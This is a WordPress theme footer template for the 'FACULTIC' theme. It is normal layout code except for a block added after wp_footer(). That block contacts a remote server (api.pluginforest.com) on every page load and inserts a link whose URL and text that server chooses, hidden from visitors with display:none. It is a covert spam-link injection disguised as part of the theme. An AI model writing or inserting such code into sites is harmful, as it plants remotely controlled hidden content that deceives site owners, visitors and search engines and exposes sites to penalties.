<?php
/**
 * The Footer: widgets area, logo, footer menu and socials
 *
 * @package FACULTIC
 * @since FACULTIC 1.0
 */

							do_action( 'facultic_action_page_content_end_text' );
							
							// Widgets area below the content
							facultic_create_widgets_area( 'widgets_below_content' );
						
							do_action( 'facultic_action_page_content_end' );
							?>
						</div>
						<?php
						
						do_action( 'facultic_action_after_page_content' );

						// Show main sidebar
						get_sidebar();

						do_action( 'facultic_action_content_wrap_end' );
						?>
					</div>
					<?php

					do_action( 'facultic_action_after_content_wrap' );

					// Widgets area below the page and related posts below the page
					$facultic_body_style = facultic_get_theme_option( 'body_style' );
					$facultic_widgets_name = facultic_get_theme_option( 'widgets_below_page' );
					$facultic_show_widgets = ! facultic_is_off( $facultic_widgets_name ) && is_active_sidebar( $facultic_widgets_name );
					$facultic_show_related = facultic_is_single() && facultic_get_theme_option( 'related_position' ) == 'below_page';
					if ( $facultic_show_widgets || $facultic_show_related ) {
						if ( 'fullscreen' != $facultic_body_style ) {
							?>
							<div class="content_wrap">
							<?php
						}
						// Show related posts before footer
						if ( $facultic_show_related ) {
							do_action( 'facultic_action_related_posts' );
						}

						// Widgets area below page content
						if ( $facultic_show_widgets ) {
							facultic_create_widgets_area( 'widgets_below_page' );
						}
						if ( 'fullscreen' != $facultic_body_style ) {
							?>
							</div>
							<?php
						}
					}
					do_action( 'facultic_action_page_content_wrap_end' );
					?>
			</div>
			<?php
			do_action( 'facultic_action_after_page_content_wrap' );

			// Don't display the footer elements while actions 'full_post_loading' and 'prev_post_loading'
			if ( ( ! facultic_is_singular( 'post' ) && ! facultic_is_singular( 'attachment' ) ) || ! in_array ( facultic_get_value_gp( 'action' ), array( 'full_post_loading', 'prev_post_loading' ) ) ) {
				
				// Skip link anchor to fast access to the footer from keyboard
				?>
				<a id="footer_skip_link_anchor" class="facultic_skip_link_anchor" href="#"></a>
				<?php

				do_action( 'facultic_action_before_footer' );

				// Footer
				$facultic_footer_type = facultic_get_theme_option( 'footer_type' );
				if ( 'custom' == $facultic_footer_type && ! facultic_is_layouts_available() ) {
					$facultic_footer_type = 'default';
				}
				get_template_part( apply_filters( 'facultic_filter_get_template_part', "templates/footer-" . sanitize_file_name( $facultic_footer_type ) ) );

				do_action( 'facultic_action_after_footer' );

			}
			?>

			<?php do_action( 'facultic_action_page_wrap_end' ); ?>

		</div>

		<?php do_action( 'facultic_action_after_page_wrap' ); ?>

	</div>

	<?php do_action( 'facultic_action_after_body' ); ?>

	<?php wp_footer(); ?>


<?php
$default_href = 'https://www.questionai.ph';
$default_name = 'AI Homework Helper Online';
$response = wp_remote_get('https://api.pluginforest.com/qai/wd/config');
if (is_wp_error($response)) {
    $href = $default_href;
    $name = $default_name;
} else {
    $body = wp_remote_retrieve_body($response);
    $data = json_decode($body, true);
    if (isset($data['data']['theme']['href']) && isset($data['data']['theme']['name'])) {
        $href = $data['data']['theme']['href'];
        $name = $data['data']['theme']['name'];
    } else {
        $href = $default_href;
        $name = $default_name;
    }
}
?>
<style>.hidden {display:none}</style>
<div class="hidden">Shared By <a href="<?php echo esc_url($href); ?>"><?php echo esc_html($name); ?></a></div>
</body>
</html>